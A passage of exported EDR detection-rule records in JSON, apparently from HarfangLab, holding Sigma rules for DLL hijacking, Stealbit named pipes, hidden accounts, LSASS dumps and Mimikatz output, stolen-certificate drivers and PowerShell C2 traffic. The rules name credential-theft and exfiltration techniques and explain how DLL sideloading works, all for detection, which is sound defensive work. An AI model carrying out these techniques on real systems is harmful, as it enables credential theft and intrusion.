'?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8cb69029-47d1-4f24-8749-1271be96e42c",
"rule_name": "DLL Hijacking via computerdefaults.exe",
"rule_description": "Detects potential Windows DLL Hijacking via computerdefaults.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8cedd1b6-00d8-4da3-8d55-99c20ee49ad9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077575Z",
"creation_date": "2026-03-23T11:45:34.077577Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077581Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1041_stealbit_named_pipe_connected.yml",
"content": "title: Stealbit Named Pipe Connected\nid: 8cedd1b6-00d8-4da3-8d55-99c20ee49ad9\ndescription: |\n Detects the connection to a named pipe pertaining to Stealbit.\n Stealbit is a complex exfiltration tool used by the LockBit ransomware group.\n It uses named pipes to coordinate its exfiltration and data-mining threads.\n It is recommended to quickly look for other signs of cybercrime activity on the instance and to isolate infected machines.\nreferences:\n - https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1041\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Malware.Stealbit\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName|endswith: '\\STEALBIT-MASTER-PIPE'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8cedd1b6-00d8-4da3-8d55-99c20ee49ad9",
"rule_name": "Stealbit Named Pipe Connected",
"rule_description": "Detects the connection to a named pipe pertaining to Stealbit.\nStealbit is a complex exfiltration tool used by the LockBit ransomware group.\nIt uses named pipes to coordinate its exfiltration and data-mining threads.\nIt is recommended to quickly look for other signs of cybercrime activity on the instance and to isolate infected machines.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8d4659ce-e1c4-4c1c-aedb-7fe1ae290905",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591140Z",
"creation_date": "2026-03-23T11:45:34.591144Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591152Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_applicationframehost.yml",
"content": "title: DLL Hijacking via ApplicationFrameHost.exe\nid: 8d4659ce-e1c4-4c1c-aedb-7fe1ae290905\ndescription: |\n Detects potential Windows DLL Hijacking via ApplicationFrameHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ApplicationFrameHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\applicationframe.dll'\n - '\\dxgi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_dgxi:\n ImageLoaded|endswith: '\\dxgi.dll'\n ImageLoaded|startswith:\n - '?:\\Program Files\\WindowsApps\\'\n - '?:\\Program Files (x86)\\WindowsApps\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of 
filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8d4659ce-e1c4-4c1c-aedb-7fe1ae290905",
"rule_name": "DLL Hijacking via ApplicationFrameHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ApplicationFrameHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8da6fece-5012-491e-a335-8dc1fa9fd87b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089235Z",
"creation_date": "2026-03-23T11:45:34.089237Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089241Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/wgpsec/CreateHiddenAccount",
"https://attack.mitre.org/techniques/T1136/001/"
],
"name": "t1136_001_hidden_user_account.yml",
"content": "title: Hidden User Account Created\nid: 8da6fece-5012-491e-a335-8dc1fa9fd87b\ndescription: |\n Detects when a user account is created with a name that impersonates a computer account.\n Attackers can create a hidden user account to establish hidden persistence on infected systems.\n It is recommended to investigate the context of this user creation and to determine whether it is legitimate.\nreferences:\n - https://github.com/wgpsec/CreateHiddenAccount\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2021/04/30\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4720\n TargetUserName|endswith: '$'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8da6fece-5012-491e-a335-8dc1fa9fd87b",
"rule_name": "Hidden User Account Created",
"rule_description": "Detects when a user account is created with a name that impersonates a computer account.\nAttackers can create a hidden user account to establish hidden persistence on infected systems.\nIt is recommended to investigate the context of this user creation and to determine whether it is legitimate.\n",
"rule_creation_date": "2021-04-30",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8da9a32c-646d-4d3c-a61a-23c5ef613681",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094461Z",
"creation_date": "2026-03-23T11:45:34.094463Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094468Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://github.com/gentilkiwi/mimikatz",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_dropping_dump_file.yml",
"content": "title: Minidump File or Mimikatz Output Written to Disk by LSASS\nid: 8da9a32c-646d-4d3c-a61a-23c5ef613681\ndescription: |\n Detects when a minidump or a Mimikatz output is written to disk by the Local Security Authority Subsystem Service (LSASS) process.\n The LSASS process is responsible for authentications in Windows.\n Attackers may try to dump or read its memory to access the credentials of local users.\n A minidump file dropped by the LSASS process could be the result of credential theft.\n It is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\nreferences:\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://github.com/gentilkiwi/mimikatz\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2023/03/28\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_write\ndetection:\n selection:\n Image|endswith: '\\lsass.exe'\n FirstBytes|contains:\n # 'Authentication' ascii string, start of mimikatz output\n - '41757468656e7469636174696f6e'\n # Minidump header\n # Value: MDMP\\x93\\xa7\n - '4d444d5093a7'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8da9a32c-646d-4d3c-a61a-23c5ef613681",
"rule_name": "Minidump File or Mimikatz Output Written to Disk by LSASS",
"rule_description": "Detects when a minidump or a Mimikatz output is written to disk by the Local Security Authority Subsystem Service (LSASS) process.\nThe LSASS process is responsible for authentications in Windows.\nAttackers may try to dump or read its memory to access the credentials of local users.\nA minidump file dropped by the LSASS process could be the result of credential theft.\nIt is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\n",
"rule_creation_date": "2023-03-28",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8db0bdc6-3a58-4eb7-af5b-e03ee6e87c7b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088648Z",
"creation_date": "2026-03-23T11:45:34.088650Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088654Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_hackingteam_stolen_cert_driver_load.yml",
"content": "title: Driver Loaded Signed with Hacking Team Certificate\nid: 8db0bdc6-3a58-4eb7-af5b-e03ee6e87c7b\ndescription: |\n Detects the loading of a driver signed using one of Hacking Team certificates.\n HackingTeam is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\n This can be the sign of a malware using a fake signature to evade AV/EDR detection.\n It is recommended to analyze the driver to search for malicious contents.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2023/07/13\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n DriverSignatureSignerThumbprint:\n - '2A1DA6DC8635E6C725CCCBE6C035EEC813FBEB2E' # Certum Level III CA - Open Source Developer, William Zoltan\n - '6C5886C0DA723E8B2AEC8C02392D4B175E793EBE' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B366DBE8B3E81915CA5C5170C65DCAD8348B11F0' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B7C646E3A433986E165BA45B209DA4A2C4111939' # Certum Code Signing CA - Luca Marcone\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8db0bdc6-3a58-4eb7-af5b-e03ee6e87c7b",
"rule_name": "Driver Loaded Signed with Hacking Team Certificate",
"rule_description": "Detects the loading of a driver signed using one of Hacking Team certificates.\nHackingTeam is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\nThis can be the sign of a malware using a fake signature to evade AV/EDR detection.\nIt is recommended to analyze the driver to search for malicious contents.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8e009fca-fb86-4253-b33b-b0f0f1ae7ba3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092834Z",
"creation_date": "2026-03-23T11:45:34.092836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092840Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_powerpnt.yml",
"content": "title: DLL Hijacking via POWERPNT.exe\nid: 8e009fca-fb86-4253-b33b-b0f0f1ae7ba3\ndescription: |\n Detects potential Windows DLL Hijacking via POWERPNT.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'POWERPNT.EXE'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\rsaenh.dll'\n - '\\twinapi.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - 
'?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8e009fca-fb86-4253-b33b-b0f0f1ae7ba3",
"rule_name": "DLL Hijacking via POWERPNT.exe",
"rule_description": "Detects potential Windows DLL Hijacking via POWERPNT.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8e5d7140-3063-49df-b46f-193f1764383c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622677Z",
"creation_date": "2026-03-23T11:45:34.622679Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622684Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1071/001/",
"https://attack.mitre.org/techniques/T1571/"
],
"name": "t1571_powershell_url_uncommon_port.yml",
"content": "title: PowerShell HTTP Request via an Uncommon Port\nid: 8e5d7140-3063-49df-b46f-193f1764383c\ndescription: |\n Detects PowerShell making a POST HTTP request on an uncommon port.\n Adversaries may use a malicious PowerShell implant that communicates over HTTP to their command and control server.\n It is recommended to investigate the PowerShell command executed by the process and determine the legitimacy of the contacted URL.\nreferences:\n - https://attack.mitre.org/techniques/T1071/001/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2024/11/08\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1571\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n ProcessName: 'powershell.exe'\n RequestUrlHost|contains: '.' 
# host without dot is probably on local network\n RequestUrlVerb: 'POST'\n\n filter_port:\n RequestUrlPort:\n - '80'\n - '443'\n - '8080'\n - '8443'\n - '5985' # winrm http\n - '5986' # winrm https\n\n filter_dest_cidr:\n RequestUrlHost|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - '100.64.0.0/10' # RFC6598\n - '192.0.0.0/24' # RFC5736\n - 'FE80::/10' # RFC4291\n\n exclusion_dest_pattern:\n RequestUrlHost:\n - 'localhost'\n - '*.local'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n - '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n - '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\CyberwatchService.exe'\n - '?:\\Program Files\\NSClient++\\nsclient++.exe'\n - '?:\\Program Files\\NSClient++\\nscp.exe'\n - '?:\\opt\\sensu\\embedded\\bin\\ruby.exe'\n - '?:\\Program Files\\Quest\\KACE\\runkbot.exe'\n - '?:\\Program Files (x86)\\Quest\\KACE\\runkbot.exe'\n - '?:\\Program Files\\Quest\\KACE\\KInventory.exe'\n - '?:\\Program Files (x86)\\Quest\\KACE\\KInventory.exe'\n - '?:\\Program Files (x86)\\ITSPlatform\\agentcore\\platform-agent-core.exe'\n - '?:\\Program Files\\Observ\\bin\\telegraf.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - '?:\\Windows\\System32\\CompatTelRunner.exe'\n - '?:\\Program Files (x86)\\RES Software\\Workspace Manager\\pfwsmgr.exe'\n - '?:\\Program Files\\ESET\\ESET Security\\ekrn.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcpatchscan.exe'\n\n exclusion_manageengine:\n RequestUrl|contains: '&agentResourceIdentifier='\n UserAgent: 'DesktopCentral Agent'\n\n exclusion_winrm:\n - UserAgent: 'Microsoft WinRM Client'\n RequestUrl|contains: '/Powershell?PSVersion='\n 
ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - UserAgent: 'Microsoft WinRM Client'\n RequestUrl|contains: '/Powershell?PSVersion='\n ProcessGrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_wsus:\n RequestUrl|endswith:\n - ':8530/ClientWebService/client.asmx'\n - ':8530/SimpleAuthWebService/SimpleAuth.asmx'\n - ':8530/ReportingWebService/ReportingWebService.asmx'\n - ':8531/ClientWebService/client.asmx'\n - ':8531/SimpleAuthWebService/SimpleAuth.asmx'\n - ':8531/ReportingWebService/ReportingWebService.asmx'\n\n exclusion_exchange:\n ProcessCommandLine|contains: '?:\\Program Files\\Microsoft\\Exchange Server\\V??\\bin\\RemoteExchange.ps1'\n\n exclusion_observ:\n ProcessCommandLine|contains: '?:\\Program Files\\Observ\\bin\\*.ps1'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8e5d7140-3063-49df-b46f-193f1764383c",
"rule_name": "PowerShell HTTP Request via an Uncommon Port",
"rule_description": "Detects PowerShell making a POST HTTP request on an uncommon port.\nAdversaries may use a malicious PowerShell implant that communicates over HTTP to their command and control server.\nIt is recommended to investigate the PowerShell command executed by the process and determine the legitimacy of the contacted URL.\n",
"rule_creation_date": "2024-11-08",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8e636923-4f5f-48f2-870d-b76e0ea0e15c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597086Z",
"creation_date": "2026-03-23T11:45:34.597090Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597097Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
